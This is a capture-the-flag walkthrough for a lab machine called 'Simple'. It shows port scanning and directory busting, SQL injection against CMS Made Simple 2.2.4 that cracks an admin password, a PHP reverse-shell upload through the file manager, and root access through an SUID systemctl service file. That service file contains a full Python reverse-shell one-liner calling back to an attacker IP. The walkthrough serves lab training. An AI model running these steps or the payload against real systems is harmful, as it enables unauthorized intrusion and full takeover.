Simple

nmap

mkdir nmap
sudo rustscan -a 172.31.1.2 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web server on port 80 is open

Web enumeration

It is running with CMS Made Simple v2.2.4 in the footer

Since it's a web server, I'll run directory busting

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.31.1.2/FUZZ  -ignore-body -recursion -recursion-depth 2 -t 40 -ic -c -o webdir.domain.root -D -e php,html,txt

After some time running, it found /admin and looks interesting. I tried logging in with default credentials but nothing works.

Since we have the version, let's take a look with searchsploit. And it turns out the version of CMS Made Simple it has is vulnerable to SQL Injection.

Exploitation

I run the script with the following parameters

python 46635.py -u http://172.31.1.2/ --crack -w /opt/wordlist/rockyou.txt

After some time running, we got the following information.

[+] Salt for password found: 18207a2929431d9f                                                            
[+] Username found: david                                                                                
[+] Email found: david@simple.csl                                                                        
[+] Password found: bbeabbca0fff4e851f840ffad0680dcf     
[+] Password cracked: punisher

Log in using this credential on /admin

Go to Content > File Manager, we will upload a reverse shell here

Create your own PHP reverse shell, but in this example I will use this awesome shell: https://github.com/ivan-sincek/php-reverse-shell

Rename your shell to <shellname>.txt and upload your shell

Now we need to rename our shell to .php extension, to do that you have to create a copy of your shell and name it with .php extension. Make your your target directory is on /uploads

Now we have successfully, uploaded our reverse shell.

Set a netcat listener and visit /uploads/shellname.php. And you should received your shell right away.

Privilege Escalation

Let's transfer linpeas.sh to target machine

Transfer the bash script with wget

Run linpeas.sh

The binary systemctl has suid flag, we can use this to gain root shell.

Create shell.service in any writable folder with the following content, and edit the IP Address and port accordingly.

[Service]
Type=oneshot
ExecStart=/bin/sh -c "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.0.41\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
[Install]
WantedBy=multi-user.target

Create a softlink with the file you have created.

Set a netcat listener, and run the following command to trigger the exploit

systemctl start shell.service

Sweet, now you're root! :D

PreviousLeakageNextShares

Last updated

Was this helpful?